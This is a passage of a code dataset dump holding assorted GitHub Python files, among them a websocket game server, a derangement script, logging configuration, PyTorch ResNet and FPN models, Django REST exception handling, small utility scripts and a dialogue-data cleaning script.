\"dgt.world\", \n \"EMAIL_ADDRESS\" : \"adminmail@mail.com\", \n \"PSEUDONYM\" : \"dgt00000000000000000\", \n \"JURISDICTION_COUNTRY_NAME\" : \"CA\", \n \"BUSINESS_CATEGORY\" : \"YOUR BUSINESS CATEGORY\", \n \"USER_ID\" : \"000000000000000001\" \n} \nDEF_WALLET_OPTS = {\n\"role\" : [\"def_role\"], \n\"limit\" : 10001, \n\"spend_period\": 61, \n\"token\" : \"DEC\", \n\"status\" : \"off\" \n}\n# external family \nSETTINGS_NAMESPACE = '000000' \n\n\ndef tmstamp2str(val):\n return time.strftime(DEC_TSTAMP_FMT, time.gmtime(val))\n\n\n\ndef load_json_proto(value): \n if isinstance(value,dict): \n info = value \n else: \n with open(value,\"r\",encoding='utf8') as cert_file: \n try: \n info = json.load(cert_file) \n \n except Exception as ex: \n print('Cant load file {} - {}'.format(value,ex)) \n info = {} \n return info \n \ndef do_verbose(dec,verbose,off=True): \n # \n if off or (verbose is None or verbose == 0): \n for k,v in dec.items(): \n if isinstance(v,dict) and DATTR_VAL in v: \n dec[k] = v[DATTR_VAL] \n if k in [DEC_TMSTAMP,DEC_LAST_HEART_TMSTAMP,DEC_SPEND_TMSTAMP,DEC_CASHIN_TMSTAMP,DEC_CREATE_TMSTAMP,DEC_MINT_TMSTAMP] and not isinstance(dec[k],str): \n dec[k] = tmstamp2str(dec[k]) \n for lock in [DEC_SALE_SHARE,DEC_SALE_TOTAL,DEC_SALE_REST]:\n if lock in dec :\n del dec[lock]\n \n return dec \n","repo_name":"DGT-Network/DGT-Matagami","sub_path":"GARANASKA_BETA/families/dec_dgt/dec_dgt/client_cli/dec_attr.py","file_name":"dec_attr.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5108916029","text":"import asyncio\nimport json\nfrom typing import cast\nfrom uuid import 
uuid4\n\nimport nest_asyncio\nfrom websockets.server import WebSocketServerProtocol, serve\n\nfrom paper_tactics.adapters.in_memory_game_repository import InMemoryGameRepository\nfrom paper_tactics.adapters.in_memory_match_request_queue import (\n    InMemoryMatchRequestQueue,\n)\nfrom paper_tactics.adapters.stdout_logger import StdoutLogger\nfrom paper_tactics.adapters.websockets_player_notifier import WebsocketsPlayerNotifier\nfrom paper_tactics.entities.cell import Cell\nfrom paper_tactics.entities.game_preferences import GamePreferences\nfrom paper_tactics.entities.match_request import MatchRequest\nfrom paper_tactics.use_cases.concede import concede\nfrom paper_tactics.use_cases.create_game import create_game\nfrom paper_tactics.use_cases.make_turn import make_turn\n\nnest_asyncio.apply()\n\ngame_repository = InMemoryGameRepository()\nmatch_request_queue = InMemoryMatchRequestQueue()\nplayer_notifier = WebsocketsPlayerNotifier()\nlogger = StdoutLogger()\n\n\nasync def handler(websocket: WebSocketServerProtocol) -> None:\n    async for message in websocket:\n        try:\n            event = json.loads(message)\n        except json.JSONDecodeError as e:\n            logger.log_exception(e)\n            return\n\n        if event.get(\"action\") == \"create-game\":\n            preferences = GamePreferences(**event.get(\"preferences\", {}))\n            request = MatchRequest(uuid4().hex, event.get(\"view_data\", {}), preferences)\n            player_notifier.websockets[request.id] = websocket\n            create_game(\n                game_repository, match_request_queue, player_notifier, logger, request\n            )\n        elif event.get(\"action\") == \"make-turn\":\n            try:\n                player_id = player_notifier.websockets.inverse[websocket]\n                game_id = event[\"gameId\"]\n                cell = cast(Cell, tuple(event[\"cell\"]))\n                assert len(cell) == 2\n            except Exception as e:\n                logger.log_exception(e)\n                return\n            make_turn(\n                game_repository, player_notifier, logger, game_id, player_id, cell\n            )\n        elif event.get(\"action\") == \"concede\":\n            try:\n                player_id = player_notifier.websockets.inverse[websocket]\n                game_id = event[\"gameId\"]\n            except Exception as e:\n                logger.log_exception(e)\n                return\n            concede(game_repository, player_notifier, logger, game_id, player_id)\n\n\nasync def main() -> None:\n    async with serve(handler, \"\", 8001):\n        await asyncio.Future()\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n","repo_name":"Kharacternyk/paper-tactics","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"9849040169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 16 22:59:33 2017\n\n@author: Tristan Dwyer\n\nscript to assign Kris Kringle gifts\ninspiration came from https://www.youtube.com/watch?v=5kC5k5QBqcc\n\n\"\"\"\nimport math\nfrom random import shuffle\nimport numpy as np\nimport sympy as sy\nimport time\n\n\nt0 = time.time()\n\nlist = [1,2,3,4,5,6,7,8,9,10,11,12]\n\ndef Derangement(x):\n    shuffle(x)\n    y = [x[-1]] + x[:-1] #rotating the shuffled list by one guarantees a derangement\n    return x,y\n\ndef count(n):\n    if n == 2 or n == 0:\n        return 1\n    elif n == 1:\n        return 0\n    elif 1 <= n <=20:\n        return round(math.factorial(n) / math.e) # Computationally quick\n    elif n.imag == 0 and n.real == int(n.real) and n > 0:\n        return (n-1) * ( sy.subfactorial(n - 1) + sy.subfactorial(n - 2) ) # from http://mathworld.wolfram.com/Subfactorial.html\n    else:\n        raise ValueError()\n\nprint(\"The total number of possible derangements is: %d\" % count(len(list)))\n \nx,y = Derangement(list)\n\nprint(x,y)\n\nfor giver, receiver in zip(x, y):\n    print(\"you are number: %d\" % giver)\n    print(\"you are buying for: %d\" % receiver)\n    print(\"\")\n    \nprint(\"total run time = \", time.time()-t0)\n# do this in groups for each family? Then pick from a different pile?\n","repo_name":"TrisD/Derangement","sub_path":"Derangement.py","file_name":"Derangement.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40573569285","text":"import logging\nimport logging.config\nimport logging.handlers\nfrom pathlib import Path\nfrom typing import Any, Dict\n\nlog_config_registry_map: Dict[str, Any] = {}\n\n\ndef get_log_config(disable_existing_loggers=False, root_logger_level='WARN', app_logger_level='INFO',\n                   log_dir: Path = Path('.'), to_file=False):\n    if to_file is True:\n        active_handlers = ['console', 'file', 'errors']\n        handlers = {\n            'handlers': {\n                'console': {\n                    'class': 'logging.StreamHandler',\n                    'formatter': 'detailed'\n                },\n                'file': {\n                    'class': 'logging.FileHandler',\n                    'filename': str(log_dir / 'insurancedb.log'),\n                    'mode': 'w',\n                    'formatter': 'detailed'\n                },\n                'errors': {\n                    'class': 'logging.FileHandler',\n                    'filename': str(log_dir / 'insurancedb-errors.log'),\n                    'mode': 'w',\n                    'formatter': 'detailed',\n                    'level': 'ERROR'\n                }\n            }\n        }\n    else:\n        active_handlers = ['console']\n        handlers = {\n            'handlers': {\n                'console': {\n                    'class': 'logging.StreamHandler',\n                    'formatter': 'detailed'\n                }\n            }\n        }\n\n    config = {\n        'version': 1,\n        'disable_existing_loggers': disable_existing_loggers,\n        'formatters': {\n            'detailed': {\n                'class': 'logging.Formatter',\n                'format': '%(asctime)s %(name)-15s %(levelname)-8s %(processName)-10s %(message)s'\n            },\n            'simple': {\n                'class': 'logging.Formatter',\n                'format': '%(name)-15s %(levelname)-8s %(processName)-10s %(message)s'\n            }\n        },\n        'loggers': {\n            'insurancedb': {\n                'handlers': active_handlers,\n                'level': app_logger_level,\n                'propagate': False\n            },\n            '__main__': {\n                'handlers': active_handlers,\n                'level': 'DEBUG',\n                'propagate': False\n            }\n        },\n        'root': {\n            'handlers': active_handlers,\n            'level': root_logger_level\n        }\n    }\n    config.update(handlers)\n    return config\n\n\ndef get_dispatch_log_config(q, disable_existing_loggers=False, root_logger_level='WARN', app_logger_level='INFO'):\n    config = {\n        'version': 1,\n        'disable_existing_loggers': disable_existing_loggers,\n        'handlers': {\n            'queue': {\n                'class': 'logging.handlers.QueueHandler',\n                'queue': q\n            }\n        },\n        'loggers': {\n            'insurancedb': {\n                'handlers': ['queue'],\n                'level': app_logger_level,\n                'propagate': False\n            },\n            '__main__': {\n                'handlers': ['queue'],\n                'level': 'DEBUG',\n                'propagate': False\n            }\n        },\n        'root': {\n            'handlers': ['queue'],\n            'level': root_logger_level\n        }\n    }\n    return config\n\n\ndef worker_log_initializer(config):\n    logging.config.dictConfig(config)\n","repo_name":"ifr1m/insurance-db","sub_path":"insurancedb/log/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2309204377","text":"import torch\nimport numpy as np\nimport os\nimport time\n\n\ndef euclidean_dist(x, y, squared=False):\n    \"\"\"\n    Compute (Squared) Euclidean distance between two tensors.\n    Args:\n        x: input tensor with size N x D.\n        y: input tensor with size M x D.\n        return: distance matrix with size N x M.\n    \"\"\"\n    n = x.size(0)\n    m = y.size(0)\n    d = x.size(1)\n    if d != y.size(1):\n        raise Exception('Invalid input shape.')\n\n    x = 
x.unsqueeze(1).expand(n, m, d)\n y = y.unsqueeze(0).expand(n, m, d)\n dist = torch.pow(x - y, 2).sum(2)\n\n if squared:\n return dist\n else:\n return torch.sqrt(dist+1e-12)\n\n\ndef to_tensor(x, device='cpu'):\n x = torch.from_numpy(x).float()\n x = x.to(device)\n return x\n\n\ndef make_path(path):\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n\ndef single_input_transform(obs_raw, device='cpu'):\n obs_var = to_tensor(obs_raw, device=device)\n obs_var = obs_var.unsqueeze(0)\n return obs_var\n\n\ndef print_localtime():\n localtime = time.localtime()\n print(\" [%d.%d.%d-%d:%d:%d]\" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday,\n localtime.tm_hour, localtime.tm_min, localtime.tm_sec))\n","repo_name":"trzhang0116/HRAC","sub_path":"discrete/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"32"} +{"seq_id":"30284929992","text":"#Name: Benyir J Pacheco\n#Email: benyir.pacheco60@myhunter.cuny.edu.\n#Date: April 17, 2020\n\n\n\nx = input(\"Enter a string: \")\nupper = 0\nlower = 0\nnum = 0\nspec = 0\n\n\nfor ch in x:\n char = ord(ch)\n if 65 <= char < 91:\n upper = upper + 1\n elif 97 <= char < 123:\n lower = lower + 1\n elif 48 <= char < 58:\n num = num + 1\n else :\n spec = spec + 1\n\nprint(\"Your codeword contains \"+str(upper)+\" uppercase letters, \"+str(lower)+\" lowercase letters, \"+str(num)+\" numbers, and \"+str(spec)+\" special characters.\")\n","repo_name":"benjpacheco/intro_to_python_schoolwork","sub_path":"assignment37.py","file_name":"assignment37.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3336706278","text":"import csv \nimport json \n\nfrom manual import ManualCsvConverter\ndef read_built_in(file): \n jsonArray = []\n with open(file, encoding='utf-8') as f: \n content = csv.DictReader(f) \n for row in content: \n jsonArray.append(row)\n return jsonArray\n\ndef write_built_in(file,data):\n with open(file, 'w', encoding='utf-8') as f: \n f.write(json.dumps(data, indent=4)) \n \ndef read_data_to_list(file_name):\n file = open(file_name)\n content = file.readlines()\n file.close()\n return content\n\n\n\ndef write_data(file_name, data):\n file = open(file_name, 'w')\n file.write(data)\n file.close()\n \n \ndef main():\n data = read_data_to_list(\"input.csv\")\n converter = ManualCsvConverter(data)\n result = converter.to_json()\n write_data(\"output.json\", result)\n \n# data=read_built_in(\"input.csv\")\n# write_built_in(\"output.json\",data)\n \nif __name__ == \"__main__\":\n main()","repo_name":"NastiaSmirnova/Python_practice","sub_path":"csv_to_json/converter_to_json.py","file_name":"converter_to_json.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30547054179","text":"#!/usr/bin/env python3\nimport json\nimport itertools\nfrom textwrap import dedent\nfrom pathlib import Path\nfrom typing import Container\n\n\ndef locate_critters(fu_root: Path, relative_path: str) -> Container[Path]:\n critters_dir = fu_root / relative_path\n return [critter.relative_to(fu_root) for critter in critters_dir.glob('**/*.monstertype')]\n\n\ndef write_patch(src_root: Path, critter: Path) -> None:\n patch_file = Path(str(src_root / critter) + '.patch')\n patch_file.parent.mkdir(parents=True, exist_ok=True)\n patch = dedent(\"\"\"\n [\n 
{\n \"op\" : \"replace\",\n \"path\" : \"/baseParameters/statusSettings/stats/maxHealth\",\n \"value\" : { \"baseValue\" : 50000 }\n },\n {\n \"op\" : \"replace\",\n \"path\" : \"/baseParameters/statusSettings/stats/healthRegen\",\n \"value\" : { \"baseValue\" : 50000 }\n }\n ]\"\"\")\n patch_file.write_text(patch)\n\n\ndef update_metadata(fu_root: Path, src_root: Path):\n fu = json.loads((fu_root / '.metadata').read_text())\n src = json.loads(\"\"\"\n {\n \"author\" : \"the-nick-of-time\",\n \"description\" : \"Extends the effects of HaxoXD's Immortal Critters mod to the critters added by Frackin Universe\",\n \"includes\" : [],\n \"friendlyName\" : \"FU Immortal Critters\",\n \"name\" : \"FUcritters\",\n \"requires\" : [\"immortalcritters\", \"FrackinUniverse\"],\n \"version\" : \"1.0\"\n }\"\"\")\n src['version'] = fu['version']\n (src_root / '.metadata').write_text(json.dumps(src, indent=2))\n\n\ndef main():\n here = Path(__file__).parent.absolute()\n fu_root = here.parent / 'dependencies/FrackinUniverse'\n src_root = here / 'src'\n critters = locate_critters(fu_root, 'monsters/critter')\n bees = locate_critters(fu_root, 'monsters/bees')\n for critter in itertools.chain(critters, bees):\n write_patch(src_root, critter)\n update_metadata(fu_root, src_root)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"the-nick-of-time/Starmod","sub_path":"FU_ImmortalCritters/generate_patch.py","file_name":"generate_patch.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19217078327","text":"s = \"Zbcdefg\"\nlst=[]\nlst1=[]\nfor i in s:\n # if i.isupper():\n # lst1.append(i)\n # else:\n lst.append(i)\nlst.sort(reverse=True)\n# lst1.sort(reverse=True)\n\n\nanswer = ''\nfor i in lst:\n answer = answer + i\n\nprint(answer)","repo_name":"CompletelyPark/python","sub_path":"programmers/문자열 내림차순으로 배치.py","file_name":"문자열 내림차순으로 배치.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44050520793","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom torchvision.models import resnet50\n\n\nclass Resnet50(nn.Module):\n def __init__(self, embedding_size, pretrained=True, is_norm=True, bn_freeze=True, add_gmp=True):\n super(Resnet50, self).__init__()\n\n self.model = resnet50(pretrained)\n self.is_norm = is_norm\n self.add_gmp = add_gmp\n self.embedding_size = embedding_size\n self.num_ftrs = self.model.fc.in_features\n self.model.gap = nn.AdaptiveAvgPool2d(1)\n self.model.gmp = nn.AdaptiveMaxPool2d(1)\n\n self.model.embedding = nn.Linear(self.num_ftrs, self.embedding_size)\n self._initialize_weights()\n\n if bn_freeze:\n for m in self.model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad_(False)\n m.bias.requires_grad_(False)\n\n if is_norm:\n self.lnorm = nn.LayerNorm(embedding_size, elementwise_affine=False).cuda()\n\n def forward(self, x):\n x = self.model.conv1(x)\n x = self.model.bn1(x)\n x = self.model.relu(x)\n x = self.model.maxpool(x)\n x = self.model.layer1(x)\n x = self.model.layer2(x)\n x = self.model.layer3(x)\n x = self.model.layer4(x)\n\n avg_x = self.model.gap(x)\n\n if self.add_gmp:\n max_x = self.model.gmp(x)\n x = max_x + avg_x\n else:\n x = avg_x\n\n x = x.view(x.size(0), -1)\n x = self.model.embedding(x)\n \n if self.is_norm:\n x = self.lnorm(x)\n \n return x\n\n def _initialize_weights(self):\n 
init.kaiming_normal_(self.model.embedding.weight, mode='fan_out')\n init.constant_(self.model.embedding.bias, 0)\n\n\n","repo_name":"ljin0429/HIST","sub_path":"code/net/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"42927859969","text":"import logging\nimport rest_framework.views\nfrom rest_framework import status\nfrom rest_framework.exceptions import APIException\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass APIError(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = 'Некорректный запрос'\n default_code = 'invalid'\n\n def __init__(self, objects_name=None, invalid_objects=None, detail=None, status_code=None, details=None, **kwargs):\n super().__init__(detail=detail, **kwargs)\n self.invalid_objects = invalid_objects\n self.objects_name = objects_name\n self.details = details\n\n if status_code is not None:\n self.status_code = status_code\n\n if not isinstance(self.detail, str):\n raise ValueError('supported only str detail')\n\n\nclass Http400(APIError):\n pass\n\n\ndef exception_handler(exc, context):\n logger.exception(f'caught unhandled exception: {exc}')\n response = rest_framework.views.exception_handler(exc, context)\n\n if response is None:\n return response\n\n if isinstance(exc, APIError):\n response.data.pop('detail')\n response.data['validation_error'] = {exc.objects_name: exc.invalid_objects}\n response.data['details'] = exc.details\n\n if isinstance(exc, Http400):\n response.data.pop('validation_error')\n response.data['details'] = exc.details\n\n return response\n","repo_name":"kpestov/candy_delivery","sub_path":"app/main/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5258038687","text":"from tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Model\nfrom models.encoders.resnet_18 import *\n\ndef resnet_fpn(input_shape, num_heads=1):\n\n model = fpn(resnet_18, input_shape, num_heads=num_heads)\n model.model_name = f\"resnet_fpn__{num_heads}_heads\"\n \n return model\n\n\ndef fpn(encoder, input_shape, num_heads=1):\n\n image_input = layers.Input(shape=input_shape)\n # mask = layers.Input(shape=input_shape)\n \n image_input, levels = encoder(image_input)\n [f0, f1,f2,f3,f4] = levels\n # paper says: f0 should be disregarded due to high memory footprint.\n\n # ***** FPN *****\n # 7x7 to 14x14\n P4 = f4\n f4_prime = layers.Conv2D(256, (1,1))(P4)\n x = layers.UpSampling2D((2, 2))(f4_prime)\n f3_prime = layers.Conv2D(256, (1,1))(f3)\n x = layers.Add()([x, f3_prime])\n x = layers.Conv2D(256, (3, 3), padding='same')(x)\n x = layers.BatchNormalization(axis=-1)(x)\n P3 = layers.Activation(\"relu\")(x)\n\n\n # 14x14 to 28x28\n x = layers.UpSampling2D((2, 2))(P3)\n f2_prime = layers.Conv2D(256, (1,1))(f2)\n x = layers.Add()([x, f2_prime])\n x = layers.Conv2D(256, (3, 3), padding='same')(x)\n x = layers.BatchNormalization(axis=-1)(x)\n P2 = layers.Activation(\"relu\")(x)\n\n\n # 28x28 to 56x56\n x = layers.UpSampling2D((2, 2))(P2)\n f1_prime = layers.Conv2D(256, (1,1))(f1)\n x = layers.Add()([x, f1_prime])\n x = layers.Conv2D(256, (3, 3), padding='same')(x)\n x = layers.BatchNormalization(axis=-1)(x)\n P1 = layers.Activation(\"relu\")(x)\n\n\n\n # ***** UPSAMPLE *****\n # upsample to 1/4 org. 
image\n    # P4 - 1\n    up_p4 = layers.Conv2D(128, (3, 3), padding='same')(P4)\n    up_p4 = layers.BatchNormalization(axis=-1)(up_p4) # tfa.layers.GroupNormalization()\n    up_p4 = layers.Activation(\"relu\")(up_p4)\n    up_p4 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p4)\n\n    # P4 - 2\n    up_p4 = layers.Conv2D(128, (3, 3), padding='same')(up_p4)\n    up_p4 = layers.BatchNormalization(axis=-1)(up_p4) # tfa.layers.GroupNormalization()\n    up_p4 = layers.Activation(\"relu\")(up_p4)\n    up_p4 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p4)\n\n    # P4 - 3\n    up_p4 = layers.Conv2D(128, (3, 3), padding='same')(up_p4)\n    up_p4 = layers.BatchNormalization(axis=-1)(up_p4) # tfa.layers.GroupNormalization()\n    up_p4 = layers.Activation(\"relu\")(up_p4)\n    up_p4 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p4)\n\n\n\n    # P3 - 1\n    up_p3 = layers.Conv2D(128, (3, 3), padding='same')(P3)\n    up_p3 = layers.BatchNormalization(axis=-1)(up_p3) # tfa.layers.GroupNormalization()\n    up_p3 = layers.Activation(\"relu\")(up_p3)\n    up_p3 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p3)\n\n    # P3 - 2\n    up_p3 = layers.Conv2D(128, (3, 3), padding='same')(up_p3)\n    up_p3 = layers.BatchNormalization(axis=-1)(up_p3) # tfa.layers.GroupNormalization()\n    up_p3 = layers.Activation(\"relu\")(up_p3)\n    up_p3 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p3)\n\n\n\n    # P2 - 1\n    up_p2 = layers.Conv2D(128, (3, 3), padding='same')(P2)\n    up_p2 = layers.BatchNormalization(axis=-1)(up_p2) # tfa.layers.GroupNormalization()\n    up_p2 = layers.Activation(\"relu\")(up_p2)\n    up_p2 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p2)\n\n    # P1 - 1\n    up_p1 = layers.Conv2D(128, (3, 3), padding='same')(P1)\n    up_p1 = layers.BatchNormalization(axis=-1)(up_p1) # tfa.layers.GroupNormalization()\n    up_p1 = layers.Activation(\"relu\")(up_p1)\n\n\n    # SUM ELEMENT WISE\n    y = layers.Add()([up_p4, up_p3, up_p2, up_p1])\n    y = layers.BatchNormalization(axis=-1)(y) # tfa.layers.GroupNormalization()\n    y = layers.UpSampling2D((4, 4), interpolation=\"bilinear\")(y)\n    y = layers.Conv2D(64, (3, 3), padding='same')(y)\n\n    y = layers.BatchNormalization(axis=-1)(y) # tfa.layers.GroupNormalization()\n    y = layers.Activation(\"relu\")(y)\n\n\n\n    # REGRESSION\n    stacked_many_heads_output = None\n    for i in range(num_heads): # get multiple heads working\n        output_reg = layers.Conv2D(3, (3, 3), padding='same')(y)\n        # output_masked_reg = layers.Multiply()([output_reg, mask])\n        \n        if stacked_many_heads_output is None:\n            stacked_many_heads_output = output_reg\n        else:\n            stacked_many_heads_output = layers.Concatenate(axis=-1)([stacked_many_heads_output, output_reg])\n        \n\n    # model = Model(inputs=[image_input, mask], outputs=stacked_many_heads_output) \n    model = Model(inputs=image_input, outputs=stacked_many_heads_output) \n\n#    model.summary()\n    \n    return model\n","repo_name":"janekzimoch/localisation_with_image","sub_path":"PlayGround/Multimodality/2D_set_of_explenations/models/decoders/fpn.py","file_name":"fpn.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18414438732","text":"import pandas as pd \r\nimport sys\r\n\r\n\"\"\"\r\nUsage: python3 combine_files.py file1.csv file2.csv\r\nExample: python3 combine_files.py a.us.csv aa.us.csv\r\n\"\"\"\r\n\r\ndef main(argv):\r\n    \r\n    # Correctly parse in the arguments\r\n    file = pd.read_csv(argv[1])\r\n    arg1 = argv[1]\r\n    tag = arg1[:-4]\r\n    file['Tag'] = tag\r\n    \r\n    file2 = pd.read_csv(argv[2])\r\n    
arg2 = argv[2]\r\n tag2 = arg2[:-4]\r\n file2['Tag'] = tag2\r\n \r\n # Create new DF and add two files into it\r\n new_file = pd.DataFrame(columns=['Date','Open','High','Low','Close','Volume','OpenInt','Tag'])\r\n new_file = pd.concat([new_file, file])\r\n new_file = pd.concat([new_file, file2])\r\n \r\n # Sort new DF\r\n new_file = new_file.sort_values(by=['Date'], ascending = False)\r\n \r\n name = tag + '_' + tag2 + '.csv'\r\n # Save new csv file\r\n new_file.to_csv(name)\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n argv = sys.argv\r\n main(argv)\r\n","repo_name":"csci4502-group4/code","sub_path":"scripts/combine_files.py","file_name":"combine_files.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29968790257","text":"\ndef quad_sequence(lst):\n #find pattern\n difference = [lst[len(lst)-2] - lst[len(lst)-3], lst[len(lst)-1] - lst[len(lst)-2]]\n difference_of_difference = difference[1] - difference[0]\n #workout\n last_num = lst[len(lst)-1]\n last_diff = difference[1]\n next_nums = []\n for _ in range(len(lst)):\n last_diff+=difference_of_difference\n last_num +=last_diff\n next_nums.append(last_num)\n return next_nums\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"YcqAY72nZNPtvofuJ_8.py","file_name":"YcqAY72nZNPtvofuJ_8.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26690877308","text":"import pickle\n\nfrom convlab.policy.vtrace_rnn_action_embedding import VTRACE_RNN\nfrom convlab.policy.vtrace_rnn_action_embedding.train import evaluate\n\n\ndef avg_token(utterances, min_avg=1.2):\n token = []\n for turn in utterances:\n if turn != '':\n token.append(len(turn.split()))\n avg_len = (sum(token)) / len(token)\n if avg_len < min_avg:\n return False\n return True\n\n\ndef word_token_ratio(utterances, ratio=0.2):\n unique_word = []\n token_num = 0\n for turn in utterances:\n if turn != '':\n for token in turn.split():\n token_num += 1\n if token not in unique_word:\n unique_word.append(token)\n if len(unique_word) / token_num < ratio:\n return False\n return True\n\n\ndef process_ppo_data(path):\n with open(path, 'rb') as file:\n memory = pickle.load(file)\n\n feedback = memory.feedback\n states = memory.states\n actions = memory.actions\n rewards = memory.rewards\n probs = memory.action_probs\n sys_output = memory.sys_outputs\n utterances = memory.utterances\n\n new_actions = []\n\n for i, action_list in enumerate(actions):\n new_action_list = []\n for j, action in enumerate(action_list):\n new_action_list.append({\"action_index\": action, \"mu\": probs[i][j], \"mask\": [0] * (len(action)+2)})\n new_actions.append(new_action_list)\n\n return feedback, states, new_actions, rewards, sys_output, utterances\n\n\nmemory_path = \"convlab/policy/best_policies/AMT_memory_for_prefilling.pkl\"\namt_data_path = \"AMT_Experiments_AMT_REAL_VTRACE_RNN_AGENT_2020-09-02-15-10-49_AMT_memory.pkl\"\nppo_data_path = \"AMT_Experiments_AMT_REAL_PPO_RNN_AGENT_2020-09-02-15-22-25_AMT_memory.pkl\"\n\nwith open(amt_data_path, 'rb') as file:\n memory = pickle.load(file)\n\nutterances = memory.utterances\nfeedback = memory.feedback\nstates = memory.states\nactions = memory.actions\nrewards = memory.rewards\nsys_output = memory.sys_outputs\n\nprint(\"Length of Dataset: \", len(feedback))\n\nppo_feedback, ppo_states, ppo_actions, ppo_rewards, ppo_outputs, ppo_utterances = 
process_ppo_data(ppo_data_path)\n\nmemory.feedback.extend(ppo_feedback)\nmemory.states.extend(ppo_states)\nmemory.actions.extend(ppo_actions)\nmemory.rewards.extend(ppo_rewards)\nmemory.sys_outputs.extend(ppo_outputs)\nmemory.utterances.extend(ppo_utterances)\n\nwith open('AMT_memory_merged.pkl', 'wb') as output:\n    pickle.dump(memory, output, pickle.HIGHEST_PROTOCOL)\n\ndelete_indices = []\nfor i in range(0, len(states)):\n    found = False\n    if len(states[i]) == 0 or len(actions[i]) == 0 or len(rewards[i]) == 0:\n        delete_indices.append(i)\n        continue\n    if len(utterances[i]) == 0:\n        delete_indices.append(i)\n        continue\n    for ut in utterances[i]:\n        if len(ut) == 0:\n            delete_indices.append(i)\n            found = True\n            break\n    if found:\n        continue\n    if len(utterances[i]) < 4:\n        delete_indices.append(i)\n        continue\n    if not word_token_ratio(utterances[i]):\n        delete_indices.append(i)\n        continue\n    if not avg_token(utterances[i]):\n        delete_indices.append(i)\n        continue\n\ndelete_indices = list(set(delete_indices)) #deduplicate, otherwise the review loop below revisits dialogs\n\nfor n, i in enumerate(delete_indices):\n\n    if n<100:\n        continue\n\n    print(f\"Dialog {i}\" + \"-\"*80)\n    fb = feedback[i]\n    utt = utterances[i]\n    sys_out = sys_output[i]\n\n    for u, s in zip(utt, sys_out):\n        print(\"User: \", u)\n        print(\"System\", s)\n    print(\"Feedback: \", fb)\n    print(n)\n    if n == 200:\n        break\n\n\nprint(\"Dialogues before cleaning: \", len(states))\nprint(\"Dialogues that will be cleaned: \", len(delete_indices))\n\nstates = [states[i] for i in range(len(states)) if i not in delete_indices]\nactions = [actions[i] for i in range(len(actions)) if i not in delete_indices]\nrewards = [rewards[i] for i in range(len(rewards)) if i not in delete_indices]\nfeedback = [feedback[i] for i in range(len(feedback)) if i not in delete_indices]\n\nnum_good = 0\nsuccessful = 0\nfor reward, fb in zip(rewards, feedback):\n    #print(\"reward: \", reward)\n    #print(\"feedback: \", fb)\n    if -1 not in reward:\n        num_good += 1\n    if fb:\n        successful += 1\n\nprint(f\"We have {num_good} good out of {len(rewards)}\")\nprint(f\"We have {successful} successful out of {len(feedback)}\")\n\nnew_rewards = []\nfor i, reward in enumerate(rewards):\n    new_rewards.append([-1] * len(reward))\n    if feedback[i]:\n        new_rewards[-1][-1] += 80\n    else:\n        new_rewards[-1][-1] += -40\n\nrewards = new_rewards\nprint(\"Length of Dataset after cleaning: \", len(states))\n#print(rewards)\n\n\nmodel_path = \"convlab/policy/best_policies/RNN_supervised\"\npolicy = VTRACE_RNN(is_train=True, seed=0, shrink=True, noisy=True)\npolicy.load(model_path)\n\ntry:\n    policy.prefill_buffer_from_amt(memory_path)\n    print(\"Successfully prefilled buffer with AMT data\")\nexcept Exception:\n    print(\"Could not prefill buffer with AMT 